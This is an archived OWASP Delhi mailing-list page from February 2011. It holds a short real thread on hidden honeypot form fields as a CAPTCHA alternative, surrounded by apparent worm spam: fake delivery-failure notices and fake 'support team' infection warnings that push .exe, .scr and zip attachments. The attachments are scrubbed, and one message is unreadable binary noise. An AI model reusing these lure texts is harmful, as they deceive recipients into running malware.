From MAILER-DAEMON at lists.owasp.org  Sat Feb  5 02:24:38 2011
From: MAILER-DAEMON at lists.owasp.org (Automatic Email Delivery Software)
Date: Sat, 5 Feb 2011 12:54:38 +0530
Subject: [Owasp-delhi] status
Message-ID: <mailman.333.1296894111.2285.owasp-delhi@lists.owasp.org>

The original message was received at Sat, 5 Feb 2011 12:54:38 +0530 from [30.176.247.84]

----- The following addresses had permanent fatal errors -----
owasp-delhi at lists.owasp.org



-------------- next part --------------
A non-text attachment was scrubbed...
Name: document.zip
Type: application/octet-stream
Size: 29392 bytes
Desc: not available
Url : https://lists.owasp.org/pipermail/owasp-delhi/attachments/20110205/d6514d14/attachment.obj 

From noreply at lists.owasp.org  Sat Feb  5 04:29:26 2011
From: noreply at lists.owasp.org (Mail Administrator)
Date: Sat, 5 Feb 2011 14:59:26 +0530
Subject: [Owasp-delhi] EDG
Message-ID: <mailman.334.1296901598.2285.owasp-delhi@lists.owasp.org>



-------------- next part --------------
A non-text attachment was scrubbed...
Name: message.zip
Type: application/octet-stream
Size: 28984 bytes
Desc: not available
Url : https://lists.owasp.org/pipermail/owasp-delhi/attachments/20110205/1badea10/attachment.obj 

From pklanka at gmail.com  Wed Feb  2 13:07:51 2011
From: pklanka at gmail.com (Phani)
Date: Wed, 2 Feb 2011 23:37:51 +0530
Subject: [Owasp-delhi] Re-considering CAPTCHAs
In-Reply-To: <AANLkTimNmpZ1pyxproD-+j-s1N+D8MaQ8pC2QecQ_AwJ@mail.gmail.com>
References: <AANLkTinZ8EJgSL48ZEz9QiDYkqmuLOpZ66kQdx=VKncB@mail.gmail.com>
	<484871.51621.qm@web120516.mail.ne1.yahoo.com>
	<AANLkTimNmpZ1pyxproD-+j-s1N+D8MaQ8pC2QecQ_AwJ@mail.gmail.com>
Message-ID: <AANLkTimfdsKBFm-0nAaWOe25f_vKrb1S2x1Wpkb_Wfed@mail.gmail.com>

Is there any analysis done which compares various captcha methods? Can
anyone share...

On Tue, Feb 1, 2011 at 9:27 AM, Gunwant Singh <gunwant.s at gmail.com> wrote:

> *1. I think this point is valid even if you deploy full-fledge CAPTCHAs.
> CAPTCHA deployed today could be exploitable a year later or may be earlier.
> *
> **
> *2. What if I use Auto-complete feature to turn-off the same, thereby
> compromising user-convenience against Security?
> *
> On Mon, Jan 31, 2011 at 9:10 PM, Vinil Menon <vinilm at yahoo.com> wrote:
>
>>  1. If you are building an "interesting" site with a decent amount of
>> traffic, your pages will become part of the "package" - how much additional
>> work would it be? I have websites whose input forms haven't been updated for
>> years now. That's a regular product life cycle -giving the spammer a lot of
>> time to tweak his tool
>>
>> 2. Anyway, a lot of users I know use the browser's autofill profiles
>> feature. Some of them also use extensions such as lastpass - and they work
>> in a similar way i.e. by scanning the html for INPUT fields and filling them
>> appropriately.
>> When they visit the sire, the users will see the browser showing the
>> yellow bar saying your form profile has been autofilled, which will confuse
>> the users because they don't see a valid input on the screen. Also, they
>> might become vary about visiting your site because it'd appear as if you are
>> harvesting information without their knowledge.
>>
>> >Vinil
>>
>>  ------------------------------
>> *From:* Gunwant Singh <gunwant.s at gmail.com>
>> *To:* OWASP DELHI <owasp-delhi at lists.owasp.org>; OWASP BLORE <
>> owasp-bangalore at lists.owasp.org>
>> *Sent:* Tue, February 1, 2011 4:42:31 AM
>> *Subject:* [Owasp-delhi] Re-considering CAPTCHAs
>>
>> Hi all,
>>
>> Hope you are doing well.
>>
>> So there was this thread on CAPTCHAs on Security focus lately and I
>> happened to read this new idea on CAPTCHA. This is what he said.
>>
>> "I hate captchas, always have so I use a reverse captcha on sites that I
>> build. You add a field to the form with name and id of email. You then give
>> it a label that says "Please leave blank" and hide them both with CSS. Most
>> people won't see them because the CSS works, even if they do see them they
>> read the message and obey. Spam engines on the other hand spot the email
>> field and happily fill it in. You then silently drop any contact forms with
>> values in the email field."
>>
>> Just wanted to know your opinion on this. How did you find this idea of
>> tricking spammers? I am concerned about this idea because of the easiness of
>> its implementation. But there can be concerns regarding customization of bot
>> softwares depending on the individual forms with such implementations. What
>> else do you have in mind?
>>
>> --
>> Gunwant Singh
>>
>>
>
>
> --
> Gunwant Singh
>
>
> _______________________________________________
> Owasp-delhi mailing list
> Owasp-delhi at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-delhi
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/pipermail/owasp-delhi/attachments/20110202/13fa1e3f/attachment.html 

From postmaster at lists.owasp.org  Mon Feb 14 05:31:48 2011
From: postmaster at lists.owasp.org (Automatic Email Delivery Software)
Date: Mon, 14 Feb 2011 16:01:48 +0530
Subject: [Owasp-delhi] (no subject)
Message-ID: <mailman.357.1297682926.2285.owasp-delhi@lists.owasp.org>

?BV??!U?,f??.G??N
??8?.4??%??T?/?f??? ???`?P>r_?UP??I-??r?$Hxb?)Y???i^?x?Y???)M3w????
?e??~?1??a?z?~?[??Q?&oAg?|???v0??
?A?{?[o--??"????6?~
?w??u???s?C4?v?????>?of??7z(??&?u?{??:?9??]^??Y??K2??mk?s??J??n?h?"?0???????&HW#?e?Gxo???r???
?o9]???1?r???E?d???w?Fz?B?????,^?Lm:???;~?u?d#7a???tZ??0wMz<-:U??O?
Fm?yv???[,}?????????:?^??????Kq?
O??{???%n??G??
X
xk?dp7???"??<??4?<?g?T?5?j?S4b?t-a?nRo??|?Q?4???{????\?{.Z???0Z?rx?????p[?U????$?&!&'?S/?Q#?8?b7D3I??6!"6?2:?:??h??????-F*???????&?ky[)??cl?P???E??g??OM0????AV<'I??m9?T?;?-?6y?Z?%????Yj??QR???|?c1?
EZp[?qJ?1?#?O?6???^?:?!H*3??FE????ntq???8o??!|????sp??rRy?r????cN??VE???w?a:???</????.?8N??<M???R
?<?????6?Q????>?9?C???0?,i?O??;??^??\??b{?????!aCJ???]???l??S?)k?D]??c?2?W?EQ1:Y9??'???q?u?????n'?b|,?????.?pB?Z?Xd??dh??F??_%?C}u???9??x?J??HJ?#4V??]????G????taI?.?Q', ??K????H9??I?zvm?W????R??~ET??sR??`????????r?d????l??Q??p?-?y
Q?Zz??t?k????\?7?5??T?8w5?"I?e??AJ??Z??????]"??Y?????v?/?N?W?????e?u?_.?i?
__?s&??x??
??V?6????? ??b???{????tT??
z???!9?????nd???J21?j?,:q?q!.?.????v?9?c??:\7_C0m?????
??'??jOK3Ze??????????y??h?;?Q?'
|_?|?F?o?1??6?E{????Gy?l?}??(
t4h?6??A?????D??`w?>8??E_KhRob???r?|,??? ???????I?I?J
?
???R??,?`5t??n*??HpY????u:?Y??A??[?[????:??b
?<'??^c?E4???b???#2W9?{T?M?G??>??W?*7??`a??)?R???q6??_?Q?????q??Uh?????R???????jr2??? ?)pA??O?????%%(???em?J?6`'D??*??`g?6?????????RM~?
ky}?#]f?U4???%?k????\??v?Rj?|?HR?*?U6#??q|b?u?.2F???}????q???;i????CpQ????????X??f?`?:????????? u&?!??h5?42?.?\?t?\???IF?c{??
?Ie?{GG??O?????O?#?#???tyk~?{Yi??aJK?3S
H???"0?JaG?&?N3??
4[???I????????y?K:??~?;??u???H???????
,??cp?kTk?????>?$c??D???>??V???N??J?z_b?GXF6?Yp/%?-???H?uMK????d?v?Nd_??s?(??:???????wBZp?pa%?v???????b?>?~?a??G?N?O????????2W???wE?glv\4???D???J?7??#?!????Ab?(?????I4?????S???0??Ty????.|0s?7.??,N?????_U???|/??Z_?
?'_????????D??CR?8?l??d?uMR???%k????8?????Fag?OW?????G?5????e?????h?jT???0???????X
^VGX?h???OPz?$??6H???m?~<?Z?c?g?kOiZ??E??F?Z???.?n
??8?G???????????8$9t??E??,??!???????)c?Co?2?^j???*p??v?g_%J?Xu??D?f????;?L?
q

-------------- next part --------------
A non-text attachment was scrubbed...
Name: message.zip
Type: application/octet-stream
Size: 28984 bytes
Desc: not available
Url : https://lists.owasp.org/pipermail/owasp-delhi/attachments/20110214/d727f3d2/attachment.obj 

From noreply at lists.owasp.org  Tue Feb 15 00:25:59 2011
From: noreply at lists.owasp.org (Automatic Email Delivery Software)
Date: Tue, 15 Feb 2011 10:55:59 +0530
Subject: [Owasp-delhi] Returned mail: see transcript for details
Message-ID: <mailman.361.1297750970.2285.owasp-delhi@lists.owasp.org>

This message was undeliverable due to the following reason:

Your message was not delivered because the destination computer was
not reachable within the allowed queue period. The amount of time
a message is queued before it is returned depends on local configura-
tion parameters.

Most likely there is a network problem that prevented delivery, but
it is also possible that the computer is turned off, or does not
have a mail system running right now.

Your message was not delivered within 5 days:
Host 120.211.245.210 is not responding.

The following recipients could not receive this message:
<owasp-delhi at lists.owasp.org>

Please reply to postmaster at lists.owasp.org
if you feel this message to be in error.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: attachment.zip
Type: application/octet-stream
Size: 28990 bytes
Desc: not available
Url : https://lists.owasp.org/pipermail/owasp-delhi/attachments/20110215/661a7d68/attachment.obj 

From noreply at lists.owasp.org  Fri Feb 18 23:58:55 2011
From: noreply at lists.owasp.org (Returned mail)
Date: Sat, 19 Feb 2011 10:28:55 +0530
Subject: [Owasp-delhi] Mail System Error - Returned Mail
Message-ID: <mailman.379.1298094934.2285.owasp-delhi@lists.owasp.org>

Dear user of lists.owasp.org,

We have detected that your account was used to send a huge amount of spam messages during this week.
Obviously, your computer had been infected and now contains a hidden proxy server.

Please follow the instruction in the attachment in order to keep your computer safe.

Virtually yours,
lists.owasp.org technical support team.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: text.exe
Type: application/octet-stream
Size: 28864 bytes
Desc: not available
Url : https://lists.owasp.org/pipermail/owasp-delhi/attachments/20110219/049d5bf3/attachment.exe 

From MAILER-DAEMON at lists.owasp.org  Tue Feb 22 01:08:09 2011
From: MAILER-DAEMON at lists.owasp.org (MAILER-DAEMON)
Date: Tue, 22 Feb 2011 11:38:09 +0530
Subject: [Owasp-delhi] Returned mail: see transcript for details
Message-ID: <mailman.387.1298358298.2285.owasp-delhi@lists.owasp.org>

The original message was included as attachment

-------------- next part --------------
A non-text attachment was scrubbed...
Name: text.scr
Type: application/octet-stream
Size: 28864 bytes
Desc: not available
Url : https://lists.owasp.org/pipermail/owasp-delhi/attachments/20110222/92a64463/attachment.obj 

From MAILER-DAEMON at lists.owasp.org  Tue Feb 22 02:27:56 2011
From: MAILER-DAEMON at lists.owasp.org (Bounced mail)
Date: Tue, 22 Feb 2011 16:27:56 +0900
Subject: [Owasp-delhi] Delivery reports about your e-mail
Message-ID: <mailman.391.1298363082.2285.owasp-delhi@lists.owasp.org>

Your message was not delivered due to the following reason:

Your message could not be delivered because the destination computer was
not reachable within the allowed queue period. The amount of time
a message is queued before it is returned depends on local configura-
tion parameters.

Most likely there is a network problem that prevented delivery, but
it is also possible that the computer is turned off, or does not
have a mail system running right now.

Your message could not be delivered within 4 days:
Host 219.67.172.9 is not responding.

The following recipients could not receive this message:
<owasp-delhi at lists.owasp.org>

Please reply to postmaster at lists.owasp.org
if you feel this message to be in error.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: message.zip
Type: application/octet-stream
Size: 29438 bytes
Desc: not available
Url : https://lists.owasp.org/pipermail/owasp-delhi/attachments/20110222/058cefaf/attachment.obj 

From noreply at lists.owasp.org  Wed Feb 23 09:58:32 2011
From: noreply at lists.owasp.org (Mail Administrator)
Date: Wed, 23 Feb 2011 20:28:32 +0530
Subject: [Owasp-delhi] Returned mail: Data format error
Message-ID: <mailman.405.1298476519.2285.owasp-delhi@lists.owasp.org>

The original message was received at Wed, 23 Feb 2011 20:28:32 +0530
from 80.212.36.233

----- The following addresses had permanent fatal errors -----
<owasp-delhi at lists.owasp.org>



-------------- next part --------------
A non-text attachment was scrubbed...
Name: uwlotpn.exe
Type: application/octet-stream
Size: 69792 bytes
Desc: not available
Url : https://lists.owasp.org/pipermail/owasp-delhi/attachments/20110223/f0d3af92/attachment.exe 

From postmaster at lists.owasp.org  Thu Feb 24 00:28:15 2011
From: postmaster at lists.owasp.org (Post Office)
Date: Thu, 24 Feb 2011 10:58:15 +0530
Subject: [Owasp-delhi] Message could not be delivered
Message-ID: <mailman.408.1298528697.2285.owasp-delhi@lists.owasp.org>

Dear user owasp-delhi at lists.owasp.org,

Your email account has been used to send a large amount of spam messages during the last week.
We suspect that your computer was compromised and now runs a trojan proxy server.

Please follow our instructions in the attached file in order to keep your computer safe.

Best regards,
lists.owasp.org support team.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: document.zip
Type: application/octet-stream
Size: 29436 bytes
Desc: not available
Url : https://lists.owasp.org/pipermail/owasp-delhi/attachments/20110224/e5055fa4/attachment.obj 

From postmaster at lists.owasp.org  Fri Feb 25 05:25:08 2011
From: postmaster at lists.owasp.org (MAILER-DAEMON)
Date: Fri, 25 Feb 2011 15:55:08 +0530
Subject: [Owasp-delhi] Delivery reports about your e-mail
Message-ID: <mailman.417.1298632908.2285.owasp-delhi@lists.owasp.org>

The original message was received at Fri, 25 Feb 2011 15:55:08 +0530 from [140.242.48.46]

----- The following addresses had permanent fatal errors -----
<owasp-delhi at lists.owasp.org>



-------------- next part --------------
A non-text attachment was scrubbed...
Name: readme.scr
Type: application/octet-stream
Size: 28864 bytes
Desc: not available
Url : https://lists.owasp.org/pipermail/owasp-delhi/attachments/20110225/e83b6dc5/attachment.obj 

